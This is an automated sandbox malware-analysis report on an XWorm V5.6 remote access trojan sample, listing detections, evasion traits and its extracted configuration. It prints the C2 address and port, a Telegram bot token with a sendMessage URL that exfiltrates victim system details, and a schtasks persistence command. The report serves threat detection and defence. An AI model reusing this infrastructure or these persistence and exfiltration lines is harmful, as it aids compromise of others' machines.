Windows Analysis Report
WV7Gj9lJ7W.exe

Overview

General Information

Sample name: WV7Gj9lJ7W.exe
renamed because original name is a hash value
Original sample name: 45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a.exe
Analysis ID: 1561588
MD5: f5869349b4c3c5902601673ccb454f8c
SHA1: 0b164e7101927fe06ddbb98b0a85bdd7757f1734
SHA256: 45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a
Tags: exeuser-Chainskilabs
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: WV7Gj9lJ7W.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Avira: detection malicious, Label: TR/Spy.Gen
Found malware configuration
Source: WV7Gj9lJ7W.exe Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe ReversingLabs: Detection: 76%
Multi AV Scanner detection for submitted file
Source: WV7Gj9lJ7W.exe ReversingLabs: Detection: 76%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: WV7Gj9lJ7W.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: WV7Gj9lJ7W.exe String decryptor: 127.0.0.1,104.198.168.179
Source: WV7Gj9lJ7W.exe String decryptor: 1337
Source: WV7Gj9lJ7W.exe String decryptor: <123456789>
Source: WV7Gj9lJ7W.exe String decryptor: <Xwormmm>
Source: WV7Gj9lJ7W.exe String decryptor: spoofer
Source: WV7Gj9lJ7W.exe String decryptor: USB.exe
Source: WV7Gj9lJ7W.exe String decryptor: %Temp%
Source: WV7Gj9lJ7W.exe String decryptor: svchost.exe
Uses 32bit PE files
Source: WV7Gj9lJ7W.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: WV7Gj9lJ7W.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 104.198.168.179:1337
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.198.168.179:1337 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49732 -> 104.198.168.179:1337
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.198.168.179:1337 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 104.198.168.179:1337
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49731 -> 149.154.167.220:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 127.0.0.1
Source: Malware configuration extractor URLs: 104.198.168.179
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 104.198.168.179:1337
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.198.168.179
Source: global traffic HTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 23 Nov 2024 20:05:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: WV7Gj9lJ7W.exe, svchost.exe.0.dr String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WV7Gj9lJ7W.exe, svchost.exe.0.dr String found in binary or memory: https://api.telegram.org/bot
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: WV7Gj9lJ7W.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Code function: 0_2_00007FFD9B8B1779 0_2_00007FFD9B8B1779
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Code function: 0_2_00007FFD9B8B6FD2 0_2_00007FFD9B8B6FD2
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Code function: 0_2_00007FFD9B8B6226 0_2_00007FFD9B8B6226
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Code function: 0_2_00007FFD9B8B24F1 0_2_00007FFD9B8B24F1
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Code function: 0_2_00007FFD9B8BFD04 0_2_00007FFD9B8BFD04
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Code function: 0_2_00007FFD9B8B2259 0_2_00007FFD9B8B2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FFD9B881779 3_2_00007FFD9B881779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FFD9B8810FA 3_2_00007FFD9B8810FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 3_2_00007FFD9B882259 3_2_00007FFD9B882259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 5_2_00007FFD9B8A1779 5_2_00007FFD9B8A1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 5_2_00007FFD9B8A10FA 5_2_00007FFD9B8A10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 5_2_00007FFD9B8A2259 5_2_00007FFD9B8A2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 8_2_00007FFD9B8B1779 8_2_00007FFD9B8B1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 8_2_00007FFD9B8B10FA 8_2_00007FFD9B8B10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 8_2_00007FFD9B8B2259 8_2_00007FFD9B8B2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 9_2_00007FFD9B8A1779 9_2_00007FFD9B8A1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 9_2_00007FFD9B8A10FA 9_2_00007FFD9B8A10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 9_2_00007FFD9B8A2259 9_2_00007FFD9B8A2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 11_2_00007FFD9B891779 11_2_00007FFD9B891779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 11_2_00007FFD9B8910FA 11_2_00007FFD9B8910FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 11_2_00007FFD9B892259 11_2_00007FFD9B892259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 13_2_00007FFD9B8B1779 13_2_00007FFD9B8B1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 13_2_00007FFD9B8B10FA 13_2_00007FFD9B8B10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 13_2_00007FFD9B8B2259 13_2_00007FFD9B8B2259
Sample file is different than original file name gathered from version info
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
Source: WV7Gj9lJ7W.exe, 00000000.00000000.1688650706.0000000000C18000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
Source: WV7Gj9lJ7W.exe Binary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
Uses 32bit PE files
Source: WV7Gj9lJ7W.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: WV7Gj9lJ7W.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: WV7Gj9lJ7W.exe, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.cs Cryptographic APIs: 'TransformFinalBlock'
Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs Cryptographic APIs: 'TransformFinalBlock'
Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@11/4@2/3
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Mutant created: NULL
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Mutant created: \Sessions\1\BaseNamedObjects\8zjo0ekcgEIZQvCP
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe Jump to behavior
Source: WV7Gj9lJ7W.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WV7Gj9lJ7W.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: WV7Gj9lJ7W.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe File read: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\WV7Gj9lJ7W.exe "C:\Users\user\Desktop\WV7Gj9lJ7W.exe"
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Section loaded: ntmarta.dll Jump to behavior
